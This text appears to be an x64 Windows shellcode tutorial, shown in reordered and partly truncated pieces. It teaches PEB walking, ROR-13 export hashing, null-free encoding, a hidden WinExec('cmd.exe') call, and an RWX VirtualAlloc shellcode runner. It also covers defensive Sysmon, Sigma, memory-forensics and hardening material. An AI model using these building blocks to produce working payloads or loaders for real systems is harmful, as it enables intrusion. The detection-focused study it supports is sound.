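For "cmd.exe" the single qword is 0x006578652E646D63: the seven characters fill the low bytes and the terminator occupies the top byte, so a direct 64-bit move of that value is not null-free.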


9. x64 ABI Constraints: Shadow Space and Alignment

Windows x64 imposes two rules shellcode authors get wrong constantly:

  1. RSP must be 16-byte aligned at the point of CALL to any Windows API. The CALL itself pushes an 8-byte return address, so the callee’s RSP ends up at (16N - 8) on entry, which is what Microsoft’s prolog code expects.
  2. The caller allocates 32 bytes of shadow space (a.k.a. home space) above the return address, even when the callee takes 0–4 arguments. The callee may spill RCX, RDX, R8, R9 into those slots.

The first four integer arguments go in RCX, RDX, R8, R9; further arguments are pushed right-to-left. Volatile registers (RAX, RCX, RDX, R8–R11) may be clobbered by any CALL; non-volatile (RBX, RBP, RDI, RSI, R12–R15) must be saved if you rely on them.

; Calling WinExec("cmd.exe", SW_HIDE) once API is resolved in RAX
; Assumes the string built in Section 8 is still at the top of the stack.
    mov   rcx, rsp                  ; lpCmdLine: take the pointer before RSP is realigned
    and   rsp, -16                  ; force 16-byte alignment
    sub   rsp, 32                   ; shadow space (home space)

    xor   edx, edx                  ; uCmdShow = SW_HIDE (0); 32-bit write zero-extends RDX
    call  rax                       ; WinExec

    add   rsp, 32                   ; tear down shadow space

Misalignment typically manifests as STATUS_ACCESS_VIOLATION inside kernel32 or ntdll MMX/SSE prologs — a tell-tale crash signature when reviewing payloads.


10. Extraction and Controlled Testing

Once assembled with NASM, raw bytes are extracted from the COFF object and audited:

nasm -f win64 payload.asm -o payload.obj
objcopy -O binary -j .text payload.obj payload.bin

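A quick Python harness sanity-checks the extracted blob: it reports the size, flags embedded nulls, and dumps a C array for a test loader. It does not by itself prove position independence; for that, also confirm the object file carries no relocations (for example with objdump -r payload.obj).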

# verify.py — sanity-check a raw shellcode blob
data = open("payload.bin", "rb").read()
print(f"[+] size: {len(data)} bytes")

null_offsets = [i for i, b in enumerate(data) if b == 0]
if null_offsets:
    print(f"[!] {len(null_offsets)} NUL byte(s), first at offset {null_offsets[0]:#x}")
else:
    print("[+] null-free")

# C-array dump for embedding in a test loader
print("unsigned char sc[] = {")
print(", ".join(f"0x{b:02x}" for b in data))
print("};")

A minimal local loader executes the payload inside the same process for isolated VM testing — this is the educational sandbox, not a cross-process injector:

// test_runner.cpp — local-only execution for analysis in a VM
// Defenders: this RWX + function-pointer-cast pattern is exactly what
// EDR/ETW THREATINT flags. It is shown so you know what to look for.
#include <windows.h>
#include <string.h>
extern unsigned char sc[];
extern size_t        sc_len;

int main(void) {
    void *mem = VirtualAlloc(NULL, sc_len,
                             MEM_COMMIT | MEM_RESERVE,
                             PAGE_EXECUTE_READWRITE);
    memcpy(mem, sc, sc_len);
    ((void(*)())mem)();
    return 0;
}

The VirtualAlloc(PAGE_EXECUTE_READWRITE) → memcpy → indirect-call triad is the canonical shellcode runner pattern and is heavily instrumented.


11. Common Attacker Techniques

Technique               Description
PEB walking             Resolve kernel32/ntdll bases via GS:[0x60] / FS:[0x30] without imports
Export hash resolution  ROR-13 (or FNV/djb2) hashing to find APIs without embedded strings
Stack strings           Push immediates to materialise "cmd.exe", "WinExec", etc., on the stack
Reflective loading      PIC stub maps a full DLL into memory and calls its DllMain (T1620)
Remote injection        VirtualAllocEx + WriteProcessMemory + CreateRemoteThread into a target PID
APC queuing             QueueUserAPC to deliver shellcode into an alertable thread
Process hollowing       Suspend a benign process, unmap its image, write PIC payload, resume
Module stomping         Overwrite the .text of a legitimately loaded DLL with PIC shellcode

12. Defensive Strategies & Detection

PIC shellcode leaves consistent telemetry across Sysmon, ETW, and memory forensics.

Sysmon Event IDs to monitor:

Event ID  Signal
1         Process creation (with command line); anomalous parents (winword.exe → cmd.exe)
7         ImageLoad from user-writable paths into system processes
8         CreateRemoteThread; primary remote-injection signal
10        ProcessAccess with GrantedAccess containing 0x1F0FFF, 0x1410, or PROCESS_VM_WRITE | PROCESS_VM_OPERATION | PROCESS_CREATE_THREAD
17/18     Named pipe creation/connection (common C2 channel)
25        ProcessTampering (image hollowing)

ETW providers give earlier and harder-to-evade signal: Microsoft-Windows-Threat-Intelligence (THREATINT) fires on VirtualAllocEx with PAGE_EXECUTE_READWRITE, WriteProcessMemory, and MapViewOfFile against remote processes. Consuming THREATINT requires the consumer to run as an anti-malware Protected Process Light (PPL), which in turn requires a Microsoft-signed ELAM driver; that is why EDR vendors, not generic SIEMs, own this telemetry. Also enable the Audit Process Creation policy (Event ID 4688) with command-line inclusion, and Audit Kernel Object to capture OpenProcess handle requests.

Sigma sketch — cross-process handle access for injection:

title: Suspicious Cross-Process Access Likely Preceding Shellcode Injection
logsource:
  product: windows
  service: sysmon
detection:
  selection:
    EventID: 10
    GrantedAccess|contains:
      - '0x1F0FFF'    # PROCESS_ALL_ACCESS (pre-Vista definition)
      - '0x1410'      # QUERY_LIMITED_INFORMATION|QUERY_INFORMATION|VM_READ
      - '0x1F1FFF'
    TargetImage|endswith:
      - '\lsass.exe'
      - '\svchost.exe'
      - '\explorer.exe'
  filter_legit:
    SourceImage|endswith:
      - '\MsMpEng.exe'
      - '\MsSense.exe'
  condition: selection and not filter_legit
level: high
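
When tuning a rule like this it helps to see what each GrantedAccess value actually grants. The sketch below decodes a mask into the documented process access rights and checks for the write/operate/create-thread combination that classic remote injection needs; the helper names are hypothetical, and only the process-specific low bits are decoded.

```python
PROCESS_RIGHTS = {
    0x0001: "PROCESS_TERMINATE",
    0x0002: "PROCESS_CREATE_THREAD",
    0x0004: "PROCESS_SET_SESSIONID",
    0x0008: "PROCESS_VM_OPERATION",
    0x0010: "PROCESS_VM_READ",
    0x0020: "PROCESS_VM_WRITE",
    0x0040: "PROCESS_DUP_HANDLE",
    0x0080: "PROCESS_CREATE_PROCESS",
    0x0100: "PROCESS_SET_QUOTA",
    0x0200: "PROCESS_SET_INFORMATION",
    0x0400: "PROCESS_QUERY_INFORMATION",
    0x0800: "PROCESS_SUSPEND_RESUME",
    0x1000: "PROCESS_QUERY_LIMITED_INFORMATION",
}

# VM_OPERATION | VM_WRITE | CREATE_THREAD
INJECTION_TRIAD = 0x0008 | 0x0020 | 0x0002


def decode_access(mask: int) -> list:
    """Names of the process-specific rights present in a GrantedAccess mask."""
    return [name for bit, name in PROCESS_RIGHTS.items() if mask & bit]


def allows_classic_injection(mask: int) -> bool:
    """True when the mask permits allocate/write plus remote thread creation."""
    return mask & INJECTION_TRIAD == INJECTION_TRIAD


for value in ("0x1410", "0x147a", "0x1F0FFF"):
    mask = int(value, 16)
    print(value, allows_classic_injection(mask), decode_access(mask))
```

Decoded this way, 0x1410 turns out to be a read-oriented mask (query rights plus PROCESS_VM_READ), which is typical of credential dumping against lsass.exe rather than of code injection, so the two cases may deserve separate rules and severities.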

Memory-forensics indicators: Volatility 3 malfind locates RWX regions containing executable code or PE headers in non-image memory; ldrmodules flags executable regions not represented in any of the three PEB loader lists — the canonical reflective/PIC signature. Threads whose StartAddress falls inside a heap allocation rather than a mapped image are inherently suspicious.
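
The same indicators can be applied to any region listing, whether it comes from a scanner export or a VirtualQueryEx sweep. The sketch below triages region records using the documented protection and type constants; the record format and the sample regions are assumptions made for illustration.

```python
PAGE_EXECUTE = 0x10
PAGE_EXECUTE_READ = 0x20
PAGE_EXECUTE_READWRITE = 0x40
PAGE_EXECUTE_WRITECOPY = 0x80
MEM_PRIVATE = 0x20000
MEM_MAPPED = 0x40000
MEM_IMAGE = 0x1000000

ANY_EXECUTE = (PAGE_EXECUTE | PAGE_EXECUTE_READ
               | PAGE_EXECUTE_READWRITE | PAGE_EXECUTE_WRITECOPY)


def triage(region: dict) -> list:
    """Return the reasons, if any, that a memory region deserves a closer look."""
    findings = []
    if region["protect"] & PAGE_EXECUTE_READWRITE:
        findings.append("RWX protection")
    if region["protect"] & ANY_EXECUTE and region["type"] != MEM_IMAGE:
        findings.append("executable but not image-backed")
    return findings


# Invented sample regions.
regions = [
    {"base": 0x7FF900000000, "protect": PAGE_EXECUTE_READ, "type": MEM_IMAGE},
    {"base": 0x000001F2A3B40000, "protect": PAGE_EXECUTE_READWRITE, "type": MEM_PRIVATE},
    {"base": 0x000001F2A3C00000, "protect": 0x04, "type": MEM_PRIVATE},
]
for region in regions:
    print(hex(region["base"]), triage(region))
```

JIT engines legitimately create private executable memory, so findings like these are triage leads to correlate with thread start addresses and loader lists, not verdicts on their own.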

Hardening:

Mitigation                      Effect
ACG (ProcessDynamicCodePolicy)  Forbids new executable pages; breaks VirtualAlloc(PAGE_EXECUTE_READWRITE)
DEP / NX                        Hardware-enforced non-execute on data pages
CFG                             Invalidates indirect calls to non-registered targets
HVCI                            Hypervisor-enforced kernel code integrity
ASR rules                       Block office/script children, untrusted USB execution, etc.
Restrict SeDebugPrivilege       Limits which accounts can open and write to other processes

[Figure: hierarchy diagram showing four defensive detection layers against PIC shellcode: ETW THREATINT telemetry, Sysmon event IDs, Volatility memory forensics, and OS hardening mitigations.]
Layered detection combines kernel-level ETW telemetry, Sysmon behavioral events, and offline memory analysis to catch shellcode across its full lifecycle.

13. Tools for PIC Shellcode Analysis

Tool            Description                                                             Link
WinDbg          Verify struct offsets (dt ntdll!_PEB, dt ntdll!_LDR_DATA_TABLE_ENTRY)   microsoft.com
NASM            Assemble x86/x64 PIC payloads in Intel syntax                           nasm.us
x64dbg          Dynamic analysis of shellcode in a loader harness                       x64dbg.com
Ghidra / IDA    Static disassembly of extracted opcodes                                 ghidra-sre.org
Process Hacker  Inspect process memory regions and protections                          processhacker.sf.io
pe-sieve        Hunts injected, hollowed, or stomped modules                            github.com/hasherezade/pe-sieve
Volatility 3    malfind, ldrmodules, vadinfo for memory-resident PIC                    volatilityfoundation.org
YARA            Signature ROR-13 loops, PEB-walk prologues, hash tables                 virustotal.github.io/yara
SilkETW         Subscribe to THREATINT and Kernel-Process providers                     github.com/mandiant/SilkETW

14. MITRE ATT&CK Mapping

Technique                          MITRE ID   Detection
Reflective Code Loading            T1620      Volatility malfind / ldrmodules; THREATINT ETW
Process Injection (parent)         T1055      Sysmon EID 10 + EID 8; ETW THREATINT WriteVM/AllocVM
Process Injection: DLL             T1055.001  Sysmon EID 7 from unusual paths; pe-sieve
Process Injection: APC             T1055.004  Kernel-Process ETW thread events on alertable waits
Process Injection: Hollowing       T1055.012  Sysmon EID 25 ProcessTampering; pe-sieve hollowing scan
Obfuscated Files or Information    T1027      YARA on ROR-13 hash loops and stack-string push sequences
Command and Scripting Interpreter  T1059      EID 4688 / Sysmon EID 1 with command-line auditing

Summary

  • Position-independent shellcode replaces the PE loader’s work at runtime: it must resolve every address it touches, starting from the segment-register pointer to the TEB.
  • The PEB → Ldr → InMemoryOrderModuleList chain reaches kernel32.dll in a handful of pointer dereferences without any string comparison.
  • Parsing the PE export directory with ROR-13 hashed lookups removes embedded API name strings and the static signatures they create.
  • Stack-string construction, XOR-zero idioms, and RIP-relative addressing keep the byte stream null-free and relocation-free.
  • Defenders catch the resulting behaviour through Sysmon EID 8/10, THREATINT ETW on VirtualAllocEx/WriteProcessMemory, and Volatility malfind/ldrmodules against unbacked RWX regions — and harden processes with ACG, CFG, HVCI, and ASR rules to break the primitive entirely.


Writing x64 Shellcode: Differences, Shadow Space, and Register Conventions

Objective: Understand the architectural and ABI-level differences between x86 and x64 Windows shellcode, including the Microsoft x64 calling convention, shadow space, stack alignment, position-independent API resolution via PEB walking, and the detection surface each technique exposes.


1. From x86 to x64: What Actually Changed

Moving shellcode from x86 to x64 Windows is not a syntactic exercise of renaming EAX to RAX. The ABI changed, the segment register that anchors the TEB changed, and the addressing model changed. A snippet that “looks right” can execute cleanly, corrupt the host process, and crash three calls later inside an SSE instruction — none of which gives the author an obvious clue.

Item                        x86                                 x64
General-purpose registers   8 × 32-bit (EAX–EDI)                16 × 64-bit (RAX–R15)
Windows calling convention  stdcall / cdecl, all args on stack  Unified fast-call, first 4 integer args in registers
TEB segment register        FS; PEB at fs:[0x30]                GS; PEB at gs:[0x60]
Address width               32-bit                              64-bit (48-bit canonical VA in practice)
call pushes                 4-byte return address               8-byte return address
RIP-relative addressing     Not available                       Available; lea rax, [rip + offset] is idiomatic in PIC

Two consequences dominate the rest of this tutorial. First, x64 adopts a single __fastcall-style ABI with a mandatory shadow space and 16-byte stack alignment rule. Second, the TEB is reached via GS, not FS, and every PEB offset must be updated for the 64-bit struct layout.


2. The Microsoft x64 ABI Deep-Dive

The Microsoft x64 calling convention passes the first four integer arguments in registers and floating-point arguments in the low halves of the first four XMM registers. Anything beyond that goes on the stack, above the shadow space, pushed right-to-left.

Argument #  Integer Register            Floating-Point Register
1st         RCX                         XMM0L
2nd         RDX                         XMM1L
3rd         R8                          XMM2L
4th         R9                          XMM3L
5th+        Stack (above shadow space)  Stack

The return value lives in RAX for integers and pointers, and in XMM0 for floating-point results.

Volatile vs Non-Volatile Registers

Class         Registers
Volatile      RAX, RCX, RDX, R8, R9, R10, R11, XMM0–XMM5
Non-volatile  RBX, RBP, RDI, RSI, RSP, R12, R13, R14, R15, XMM6–XMM15

A callee may freely destroy volatile registers; non-volatile registers must be preserved across calls. Shellcode that clobbers RBX or RDI in the host thread and then returns control corrupts the host. This is the single most common reason “working” shellcode crashes the host process several instructions after the shellcode finishes.

Side-by-Side: x86 Push vs x64 Register Load

; --- x86 stdcall: MessageBoxA(0, "msg", "title", 0) ---
push 0              ; uType
push title          ; lpCaption
push msg            ; lpText
push 0              ; hWnd
call [MessageBoxA]  ; callee cleans the stack

; --- x64 fastcall: same call ---
xor  rcx, rcx                       ; hWnd      = NULL
lea  rdx, [rel msg]                 ; lpText
lea  r8,  [rel title]               ; lpCaption
xor  r9d, r9d                       ; uType     = 0
sub  rsp, 0x28                      ; shadow space + alignment (see §4)
call [rel MessageBoxA]
add  rsp, 0x28

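Note xor r9d, r9d rather than xor r9, r9: writing to the 32-bit sub-register zero-extends to the full 64-bit register, so the two are equivalent. For R8–R15 both forms need a REX prefix and encode to 3 bytes (45 31 C9 versus 4D 31 C9), so nothing is saved there; the size win applies to the legacy registers, where xor ecx, ecx is 2 bytes (31 C9) against 3 for xor rcx, rcx (48 31 C9). All four encodings are null-free.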
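
The byte counts follow from how the REX prefix works, which the short encoder below reproduces. It is a sketch that handles only the register-to-itself XOR (opcode 31 /r); the function name and register table are illustrative.

```python
REGISTERS = ["rax", "rcx", "rdx", "rbx", "rsp", "rbp", "rsi", "rdi",
             "r8", "r9", "r10", "r11", "r12", "r13", "r14", "r15"]


def encode_xor_self(register: str, wide: bool) -> bytes:
    """Encode `xor reg, reg` using the 64-bit (wide) or 32-bit operand size."""
    index = REGISTERS.index(register)
    rex = 0x40
    if wide:
        rex |= 0x08                 # REX.W selects 64-bit operand size
    if index >= 8:
        rex |= 0x04 | 0x01          # REX.R and REX.B extend both ModRM fields
    modrm = 0xC0 | ((index & 7) << 3) | (index & 7)
    prefix = bytes([rex]) if rex != 0x40 else b""
    return prefix + bytes([0x31, modrm])


for reg, wide in (("rcx", False), ("rcx", True), ("r9", False), ("r9", True)):
    label = reg if wide else f"{reg} (32-bit form)"
    print(f"xor {label:18} {encode_xor_self(reg, wide).hex(' ')}")
```

The 32-bit form of a legacy register needs no prefix at all, whereas any use of R8 through R15 forces a REX byte regardless of operand size.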


[Figure: diagram showing the Microsoft x64 calling convention: arguments flow through RCX, RDX, R8, R9, then onto the stack, with the return value in RAX.]
The Microsoft x64 ABI passes the first four integer arguments in registers; additional arguments land on the stack above shadow space.

3. Shadow Space: Why, What, and Where

In the Microsoft x64 convention the caller must reserve 32 bytes (4 × 8) of stack immediately above the return address as shadow space (also called home space or spill space). This area exists so the callee has somewhere to spill RCX, RDX, R8, and R9 back to memory if it needs to take their addresses or free up the registers for re-use.

Critical points:

  • Shadow space is always reserved, even when the callee takes fewer than four arguments and even when the callee never spills.
  • It is allocated by the caller, but the callee is free to overwrite it without saving the previous contents.
  • The caller does not zero or initialise it. The callee is responsible for whatever it writes there.
  • Stack arguments beyond the fourth begin at [RSP + 0x28] (32 bytes shadow + 8 bytes return address).

Layout immediately after call, before callee prologue  Offset from RSP
Return address (pushed by call)                        [RSP + 0x00]
Shadow slot for RCX                                    [RSP + 0x08]
Shadow slot for RDX                                    [RSP + 0x10]
Shadow slot for R8                                     [RSP + 0x18]
Shadow slot for R9                                     [RSP + 0x20]
5th argument (if any)                                  [RSP + 0x28]

Skip the shadow allocation and the first thing the callee does (often a mov [rsp+8], rcx early in a Win32 prologue) overwrites whatever sits directly above its return address: your own stack data or, worse, the return address your shellcode needs in order to hand control back.
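
When reading a crash dump it is convenient to compute where a given argument should be relative to RSP at callee entry. The sketch below generates that layout for any argument count; it is a hypothetical helper that simply applies the rules listed above.

```python
def callee_entry_layout(num_args: int) -> dict:
    """Map each stack slot to its offset from RSP on entry to the callee."""
    layout = {"return address": 0x00}
    for position, register in enumerate(("RCX", "RDX", "R8", "R9"), start=1):
        layout[f"home slot for {register}"] = 8 * position
    for n in range(5, num_args + 1):
        layout[f"argument {n}"] = 0x28 + 8 * (n - 5)   # first slot past the shadow space
    return layout


for slot, offset in callee_entry_layout(6).items():
    print(f"[RSP + 0x{offset:02X}]  {slot}")
```

The four home slots exist even for a zero-argument callee, which is why the first stack-passed argument never appears below offset 0x28.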


[Figure: stack layout diagram showing the mandatory 32-byte shadow space between the return address and stack arguments in the Microsoft x64 calling convention.]
The caller must always reserve 32 bytes of shadow space directly above the return address, with additional stack arguments starting at RSP+0x28.

4. Stack Alignment in Practice

The Microsoft x64 ABI requires RSP to be 16-byte aligned at the moment of a call, except inside a prolog. The hardware call then pushes an 8-byte return address, so on entry to the callee RSP is 16N + 8 aligned. Win32 internals (memcpy, CRT, anything that uses SSE/AVX with aligned moves) will issue movaps / movdqa against stack locations and will raise EXCEPTION_ACCESS_VIOLATION (0xC0000005) if RSP is wrong by 8.

This is why the canonical shellcode prologue is sub rsp, 0x28, not 0x20:

  • 0x20 (32 bytes) for shadow space.
  • + 0x08 to undo the misalignment the preceding call introduced.

; Canonical shellcode call wrapper
sub rsp, 0x28          ; 32B shadow + 8B realign
call rax               ; rax = resolved API address
add rsp, 0x28

When the shellcode entry itself was reached by a jump from unknown context, force alignment explicitly:

; Defensive entry: align RSP regardless of caller state
and rsp, 0xFFFFFFFFFFFFFFF0   ; force 16-byte alignment
sub rsp, 0x20                  ; shadow space only: RSP is already aligned, so adding 8 here would misalign the next call

To diagnose alignment faults in WinDbg, dump the faulting instruction (u .) and check whether it is a movaps / movdqa referencing [rsp+…]. If rsp & 0xF == 0x8 at the call, you forgot the + 0x08.
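
The arithmetic behind 0x28 versus 0x20 generalises to any argument count and any starting alignment. The sketch below computes how many bytes to subtract from RSP before a call so that shadow space, stack arguments, and 16-byte alignment all hold; it is a hypothetical helper, and rsp_mod16 is the value of RSP modulo 16 before the adjustment.

```python
def frame_adjust(num_args: int, rsp_mod16: int) -> int:
    """Bytes to subtract from RSP so it is 16-byte aligned at the CALL."""
    stack_args = max(0, num_args - 4)
    needed = 0x20 + 8 * stack_args          # shadow space plus stack-passed args
    padding = (rsp_mod16 - needed) % 16     # extra bytes to land on a multiple of 16
    return needed + padding


# Entered via CALL (RSP is 8 mod 16), four or fewer arguments: the classic 0x28.
print(hex(frame_adjust(4, 8)))
# RSP already forced to a 16-byte boundary: shadow space alone is enough.
print(hex(frame_adjust(4, 0)))
# Six arguments after being entered via CALL.
print(hex(frame_adjust(6, 8)))
```

The result depends on the starting state: the same 0x28 that is correct after a call is wrong after an explicit and rsp, -16, which is a common source of the movaps faults described above.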


5. Position-Independent Code Fundamentals

Shellcode does not know where it will land. Hard-coded addresses are forbidden — ASLR randomises module bases per boot, and the shellcode itself is dropped at an allocator-chosen address. Two x64 idioms enable position independence:

  • RIP-relative addressing. lea rax, [rel label] resolves to lea rax, [rip + disp32] and produces correct results regardless of load address. This is the preferred way to reference embedded data in x64 shellcode.
  • call/pop delta trick. A call to the next instruction pushes its return address, which is the runtime location of the following label. The code at that label pops it into a register to obtain a base for subsequent offsets.

; Obtain the runtime address of `data` without RIP-relative encoding
    call get_rip
get_rip:
    pop rbx                  ; rbx = runtime address of get_rip (the return address)
    lea rsi, [rbx + data - get_rip]
    jmp continue
data:
    db "kernel32.dll", 0
continue:

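In practice, prefer lea reg, [rel label] for clarity; reach for call/pop only when an encoder demands it. Neither form is automatically free of bad bytes: a call to the very next instruction encodes as E8 00 00 00 00, and a forward RIP-relative lea carries a small positive disp32 whose high bytes are zero. Null-sensitive code therefore arranges for the displacement to be negative (a backward reference), which fills the high bytes with FF instead.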
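The displacement arithmetic behind both idioms is the same: the encoded value is the target minus the address of the next instruction. The sketch below illustrates that under stated assumptions; rel32 is a hypothetical helper and the addresses are made up for the example.

```python
import struct


def rel32(insn_addr: int, insn_len: int, target: int) -> bytes:
    """Encode the signed 32-bit displacement used by `call rel32` and by
    RIP-relative operands: target - (address of the next instruction)."""
    disp = target - (insn_addr + insn_len)
    return struct.pack("<i", disp)


if __name__ == "__main__":
    # call to the very next instruction (5-byte E8 call): displacement is zero.
    print(rel32(0x1000, 5, 0x1005).hex())          # 00000000
    # 7-byte lea rax, [rip+disp32] reaching data 0x20 bytes ahead: same bytes at any base.
    print(rel32(0x1000, 7, 0x1020).hex())          # 19000000
    print(rel32(0x7FF600001000, 7, 0x7FF600001020).hex())  # 19000000
    # Backward reference: negative displacement, no zero bytes in this case.
    print(rel32(0x1020, 5, 0x1000).hex())          # dbffffff
```

Because only the distance between instruction and target is encoded, the bytes do not change when the whole blob is relocated, which is what makes both idioms position independent.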


6. PEB Walking: Finding kernel32.dll Without Imports

Because shellcode has no import table, it must walk the loader’s in-memory bookkeeping to find kernel32.dll and then resolve GetProcAddress / LoadLibraryA from its exports. On x64 Windows the chain starts at GS and uses these offsets:

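Step  Source                      Field                                Offset (x64)
1     GS segment                  TEB                                  -
2     TEB                         ProcessEnvironmentBlock              +0x060
3     PEB                         Ldr (pointer to PEB_LDR_DATA)        +0x018
4     PEB_LDR_DATA                InMemoryOrderModuleList              +0x020
5     LDR_DATA_TABLE_ENTRY link   InMemoryOrderLinks.Flink             +0x000
6     LDR_DATA_TABLE_ENTRY        DllBase (from InMemoryOrderLinks)    +0x020

DllBase sits at +0x030 from the start of LDR_DATA_TABLE_ENTRY and InMemoryOrderLinks at +0x010, so DllBase is +0x020 from the link that the list walk lands on.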

The InMemoryOrderModuleList on a normal process begins with the executable, then ntdll.dll, then kernel32.dll. The list head’s Flink points at the first entry, so two further Flink dereferences reach the kernel32.dll entry. Production-grade shellcode hashes the BaseDllName string rather than trusting that order, both for resilience and because EDRs can deliberately permute the head of the list as a tripwire (see §11).

; --- PEB walk skeleton: locate kernel32.dll base in rax ---
    xor   eax, eax
    mov   rbx, [gs:0x60]        ; TEB -> PEB
    mov   rbx, [rbx + 0x18]     ; PEB -> Ldr (PEB_LDR_DATA)
    mov   rbx, [rbx + 0x20]     ; -> InMemoryOrderModuleList.Flink
                                ;    (points into 1st LDR_DATA_TABLE_ENTRY's InMemoryOrderLinks)
    mov   rbx, [rbx]            ; advance: -> 2nd entry (ntdll)
    mov   rbx, [rbx]            ; advance: -> 3rd entry (kernel32)
    mov   rax, [rbx + 0x20]     ; DllBase: +0x30 in the entry, minus 0x10 for InMemoryOrderLinks (x64)
                                ; rax now holds kernel32.dll base address

To verify the offsets against the target OS build, drop into WinDbg on a live process and dump the structures directly:

0:000> dt nt!_TEB ProcessEnvironmentBlock
0:000> dt nt!_PEB Ldr
0:000> dt nt!_PEB_LDR_DATA InMemoryOrderModuleList
0:000> dt nt!_LDR_DATA_TABLE_ENTRY DllBase BaseDllName
0:000> !lmi kernel32
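The offsets can also be cross-checked offline by modelling the leading fields of the x64 loader structures with ctypes. This is a sketch under assumptions: the class names with a 64 suffix and the explicit padding fields are labels chosen here, and only the fields needed for the walk are declared.

```python
import ctypes
from ctypes import c_uint16, c_uint32, c_uint64


class LIST_ENTRY64(ctypes.Structure):
    _fields_ = [("Flink", c_uint64), ("Blink", c_uint64)]


class UNICODE_STRING64(ctypes.Structure):
    _fields_ = [("Length", c_uint16), ("MaximumLength", c_uint16),
                ("_pad", c_uint32),            # explicit padding before the pointer
                ("Buffer", c_uint64)]


class PEB_LDR_DATA64(ctypes.Structure):
    _fields_ = [("Length", c_uint32),
                ("Initialized", c_uint32),     # BOOLEAN plus padding, modelled as 4 bytes
                ("SsHandle", c_uint64),
                ("InLoadOrderModuleList", LIST_ENTRY64),
                ("InMemoryOrderModuleList", LIST_ENTRY64),
                ("InInitializationOrderModuleList", LIST_ENTRY64)]


class LDR_DATA_TABLE_ENTRY64(ctypes.Structure):   # leading fields only
    _fields_ = [("InLoadOrderLinks", LIST_ENTRY64),
                ("InMemoryOrderLinks", LIST_ENTRY64),
                ("InInitializationOrderLinks", LIST_ENTRY64),
                ("DllBase", c_uint64),
                ("EntryPoint", c_uint64),
                ("SizeOfImage", c_uint32),
                ("_pad0", c_uint32),
                ("FullDllName", UNICODE_STRING64),
                ("BaseDllName", UNICODE_STRING64)]


def dllbase_from_memory_order_link() -> int:
    """Distance from InMemoryOrderLinks (where the list walk lands) to DllBase."""
    entry = LDR_DATA_TABLE_ENTRY64
    return entry.DllBase.offset - entry.InMemoryOrderLinks.offset


if __name__ == "__main__":
    print(hex(PEB_LDR_DATA64.InMemoryOrderModuleList.offset))  # 0x20
    print(hex(LDR_DATA_TABLE_ENTRY64.DllBase.offset))          # 0x30
    print(hex(dllbase_from_memory_order_link()))               # 0x20
```

The WinDbg dt output on the target build remains the authority; the model is only a quick way to keep the "offset from the entry" and "offset from the link" numbers apart.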

[Figure: flow diagram tracing the PEB walk from the GS register through PEB_LDR_DATA and InMemoryOrderModuleList to the kernel32.dll base address.]
Shellcode reaches kernel32.dll by following two Flink pointers from the InMemoryOrderModuleList head anchored at GS:[0x60].

7. Parsing the Export Address Table

With kernel32.dll’s base in hand, the shellcode walks the PE headers to the Export Directory and then iterates AddressOfNames, comparing each name against a precomputed hash. String literals like "GetProcAddress" are avoided to defeat trivial signatures and to remove embedded nulls.

Key offsets from a loaded module base:

Field                           Offset
e_lfanew (RVA of PE header)     DllBase + 0x3C
Optional Header                 PE_header + 0x18
Export Directory RVA (PE32+)    OptHeader + 0x70
AddressOfFunctions              ExportDir + 0x1C
AddressOfNames                  ExportDir + 0x20
AddressOfNameOrdinals           ExportDir + 0x24

; --- EAT walk outline: resolve an export by ROR-13 name hash ---
; in : rax = module base, ebp = target hash (e.g. for "GetProcAddress")
; out: rax = exported function address (or 0)

    mov   ecx, [rax + 0x3C]      ; e_lfanew
    add   rcx, rax               ; rcx = PE header
    mov   edx, [rcx + 0x88]      ; Export Directory RVA (OptHdr + 0x70)
    add   rdx, rax               ; rdx = IMAGE_EXPORT_DIRECTORY
    mov   r8d,  [rdx + 0x18]     ; NumberOfNames
    mov   r9d,  [rdx + 0x20]     ; AddressOfNames RVA
    add   r9, rax
    xor   r10, r10               ; index

.next_name:
    mov   esi, [r9 + r10*4]      ; name RVA
    add   rsi, rax               ; rsi -> ASCII export name
    xor   edi, edi               ; hash accumulator

.hash_byte:
    movzx ecx, byte [rsi]        ; ecx as scratch: rax must keep holding the module base
    test  cl, cl
    jz    .check
    ror   edi, 13
    add   edi, ecx
    inc   rsi
    jmp   .hash_byte

.check:
    cmp   edi, ebp               ; compare ROR-13 hash
    je    .found
    inc   r10
    cmp   r10d, r8d
    jb    .next_name
    xor   rax, rax               ; not found
    ret
.found:
    ; resolve via AddressOfNameOrdinals + AddressOfFunctions
    ; (omitted for brevity)
    ret

The ROR-13 rotate-and-add hash, popularised by the Metasploit block_api stub, is the de facto standard, which is precisely why defenders now key on it (see §11).
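For analysts, the useful direction is the reverse one: given a 32-bit constant found in a sample, work out which export name it stands for. The sketch below mirrors the rotate-then-add loop in the listing above (function name only, terminator excluded); it is not Metasploit's block_api variant, which also folds the module name into the hash. The function names and the candidate list are illustrative.

```python
def ror32(value: int, count: int) -> int:
    """Rotate a 32-bit value right by count bits."""
    count %= 32
    return ((value >> count) | (value << (32 - count))) & 0xFFFFFFFF


def ror13_hash(name: str) -> int:
    """Rotate-right-13 then add, once per byte of the ASCII name."""
    h = 0
    for byte in name.encode("ascii"):
        h = ror32(h, 13)
        h = (h + byte) & 0xFFFFFFFF
    return h


def build_lookup(export_names):
    """Map hash -> name so constants seen in a sample can be annotated."""
    return {ror13_hash(n): n for n in export_names}


if __name__ == "__main__":
    table = build_lookup(["GetProcAddress", "LoadLibraryA", "ExitProcess"])
    print(hex(ror13_hash("GetProcAddress")))   # 0x7c0dfcaa
    print(table.get(0x7C0DFCAA))               # GetProcAddress
```

Feeding the lookup with the full export list of kernel32.dll (for example from a PE parser) turns opaque immediates in a disassembly into readable API names.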


8. Null-Byte and Bad-Character Avoidance

Shellcode delivered through a string-copy primitive (strcpy, lstrcatA, format-string echo) is truncated at the first null byte. x64 immediates routinely embed nulls because most useful constants and addresses do not occupy all 64 bits.

Problem                                        Fix
mov rax, 0x000000007FFE1234 (nulls in imm64)   mov eax, 0x7FFE1234 (zero-extends; a preceding xor eax, eax is optional)
64-bit literal in mov r9, imm64                lea r9, [rel label] or build via shifts/ORs
push 0 (encodes 6A 00)                         xor rcx, rcx ; push rcx
mov rcx, 0 (7-byte encoding, four nulls)       xor ecx, ecx

; --- Null-byte comparison ---
; BAD: mov rax, 0x76ab1234
;   48 B8 34 12 AB 76 00 00 00 00   <-- four null bytes
mov rax, 0x76ab1234

; GOOD: zero-extend via 32-bit sub-register
;   31 C0                            <-- xor eax, eax
;   B8 34 12 AB 76                   <-- mov eax, 0x76AB1234
xor eax, eax
mov eax, 0x76ab1234

Writing to EAX implicitly zeroes the upper 32 bits of RAX — this single architectural quirk eliminates most accidental nulls in shellcode constants.

A short Python lab to validate a candidate snippet:

from keystone import Ks, KS_ARCH_X86, KS_MODE_64

